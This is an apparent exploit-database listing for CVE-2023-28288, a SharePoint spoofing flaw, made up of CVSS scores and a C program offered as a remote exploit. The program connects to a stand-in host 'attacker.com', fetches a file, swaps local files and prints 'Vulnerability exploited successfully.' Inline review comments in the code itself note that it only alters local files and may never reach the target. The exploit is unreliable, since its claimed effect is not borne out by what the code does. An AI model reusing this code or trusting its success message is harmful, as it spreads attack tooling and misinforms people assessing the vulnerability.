
Microsoft SharePoint Enterprise Server 2016 Spoofing

2023-06-2700:00:00
Amirhossein Bahramizadeh
packetstormsecurity.com
120

8.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

5.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:P/A:N

0.001 Low

EPSS

Percentile

40.5%

`// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing  
// Date: 2023-06-20  
// country: Iran  
// Exploit Author: Amirhossein Bahramizadeh  
// Category : Remote  
// Vendor Homepage:  
// Microsoft SharePoint Foundation 2013 Service Pack 1  
// Microsoft SharePoint Server Subscription Edition  
// Microsoft SharePoint Enterprise Server 2013 Service Pack 1  
// Microsoft SharePoint Server 2019  
// Microsoft SharePoint Enterprise Server 2016  
// Tested on: Windows/Linux  
// CVE : CVE-2023-28288  
  
#include <windows.h>
#include <wininet.h>   /* InternetOpen, InternetConnect, HttpOpenRequest, HttpSendRequest,
                          InternetReadFile, InternetCloseHandle — link against wininet.lib */

#include <stdio.h>
#include <string.h>    /* strlen (used when writing the fake file) */
  
  
/*
 * Placeholder strings shared by main() and InternetReadFileUrl().
 * All four are plain NUL-terminated C strings with external linkage.
 */
const char *server_url     = "http://example.com/";   /* base URL main() prepends to file_name */
const char *file_name      = "vuln_file.aspx";        /* name requested from server_url; also a local path */
const char *fake_url       = "http://attacker.com/";  /* value InternetReadFileUrl() hands to InternetConnect() */
const char *fake_file_name = "fake_file.aspx";        /* local file main() creates and later renames */
  
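/*
 * Entry point.  Writes a small HTML file locally, fetches server_url+file_name
 * into a second local file, swaps the two on the local filesystem, then issues
 * the same GET again with the body discarded.
 *
 * Returns 0 when every step reported success, 1 on the first failure.
 */
int main(void)
{
    /* Defined after main(); a prototype here avoids an implicit declaration
     * (invalid since C99) at the two call sites below. */
    BOOL InternetReadFileUrl(const char *url, HANDLE file);

    HANDLE file;
    DWORD bytes_written = 0;
    char file_contents[1024];
    int n;

    /* Build the fake file body.  snprintf bounds the write where the original
     * used sprintf; the literal is far shorter than the buffer. */
    n = snprintf(file_contents, sizeof file_contents,
                 "<html><head></head><body><p>This is a fake file.</p></body></html>");
    if (n < 0 || (size_t)n >= sizeof file_contents)
    {
        printf("Error building fake file contents\n");
        return 1;
    }

    /* Write the fake file to a path relative to the current working directory. */
    file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE)
    {
        /* GetLastError() returns a DWORD (unsigned long): %lu, not %d. */
        printf("Error creating fake file: %lu\n", GetLastError());
        return 1;
    }
    /* Length comes from snprintf's return value; a short write is an error too. */
    if (!WriteFile(file, file_contents, (DWORD)n, &bytes_written, NULL) || bytes_written != (DWORD)n)
    {
        printf("Error writing fake file: %lu\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);

    /* Request server_url + file_name and store the response body in a local
     * file of the same name.  InternetReadFileUrl() connects to fake_url rather
     * than to server_url's host (see that function), so whether this request
     * ever reaches server_url is not established by this code. */
    n = snprintf(file_contents, sizeof file_contents, "%s%s", server_url, file_name);
    if (n < 0 || (size_t)n >= sizeof file_contents)
    {
        printf("Error building request URL\n");
        return 1;
    }
    file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE)
    {
        printf("Error creating vulnerable file: %lu\n", GetLastError());
        return 1;
    }
    if (!InternetReadFileUrl(file_contents, file))
    {
        /* The callee closes its WinINet handles before returning, so the value
         * reported here may no longer be the original failure code. */
        printf("Error downloading vulnerable file: %lu\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);

    /* Both names are relative local paths: this deletes and renames files on
     * the machine running the program.  Nothing here modifies the server's copy. */
    if (!DeleteFile(file_name))
    {
        printf("Error deleting vulnerable file: %lu\n", GetLastError());
        return 1;
    }
    if (!MoveFile(fake_file_name, file_name))
    {
        printf("Error replacing vulnerable file: %lu\n", GetLastError());
        return 1;
    }

    /* Repeat the GET for the same URL with the body discarded (NULL handle).
     * file_contents still holds server_url + file_name — the original rebuilt
     * it identically here.  What, if anything, this second request changes on
     * the server side is not shown by this code. */
    if (!InternetReadFileUrl(file_contents, NULL))
    {
        printf("Error triggering vulnerability: %lu\n", GetLastError());
        return 1;
    }

    /* Reached only when every call above reported success. */
    printf("Vulnerability exploited successfully.\n");

    return 0;
}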
  
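/*
 * Perform an HTTP GET with WinINet and optionally copy the response body to
 * an open file handle.
 *
 * url   - object name passed to HttpOpenRequest().  main() passes a full
 *         "http://..." string here.
 * file  - handle to write the body to, or NULL to discard the body.
 *
 * Returns TRUE only when the request was sent, the server answered 200, and
 * every body chunk was read (and, when file != NULL, fully written).  Returns
 * FALSE otherwise.  All WinINet handles are closed on every path; because of
 * that, GetLastError() in the caller may not reflect the original failure.
 */
BOOL InternetReadFileUrl(const char *url, HANDLE file)
{
    HINTERNET internet = NULL, connection = NULL, request = NULL;
    BOOL ok = FALSE;
    DWORD bytes_read = 0, bytes_written = 0;
    DWORD status = 0, status_len = sizeof status;
    char buffer[1024];

    internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    if (internet == NULL)
    {
        goto out;
    }

    /* NOTE(review): InternetConnect() takes a server name, but fake_url is a
     * full "http://..." URL, and the object name handed to HttpOpenRequest()
     * below is also a full URL rather than a path.  Whether the request ever
     * reaches server_url is not established here — confirm before relying on it. */
    connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    if (connection == NULL)
    {
        goto out;
    }

    request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);
    if (request == NULL)
    {
        goto out;
    }
    if (!HttpSendRequest(request, NULL, 0, NULL, 0))
    {
        goto out;
    }

    /* The original treated any completed exchange as success, so an error
     * page (404, 500, ...) would be saved to disk as the downloaded file. */
    if (!HttpQueryInfo(request, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &status, &status_len, NULL)
        || status != HTTP_STATUS_OK)
    {
        goto out;
    }

    /* Drain the body.  A failing InternetReadFile() is an error; the original
     * loop silently ended and returned TRUE on it. */
    for (;;)
    {
        if (!InternetReadFile(request, buffer, sizeof buffer, &bytes_read))
        {
            goto out;
        }
        if (bytes_read == 0)
        {
            break;  /* end of response */
        }
        if (file == NULL)
        {
            continue;  /* caller only wants the request made */
        }
        /* Separate out-parameter: the original reused bytes_read for the count
         * written, conflating "read" and "written". */
        if (!WriteFile(file, buffer, bytes_read, &bytes_written, NULL) || bytes_written != bytes_read)
        {
            goto out;
        }
    }
    ok = TRUE;

out:
    /* Close in reverse order of acquisition, only what was actually opened. */
    if (request != NULL)
    {
        InternetCloseHandle(request);
    }
    if (connection != NULL)
    {
        InternetCloseHandle(connection);
    }
    if (internet != NULL)
    {
        InternetCloseHandle(internet);
    }
    return ok;
}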
  
  
`
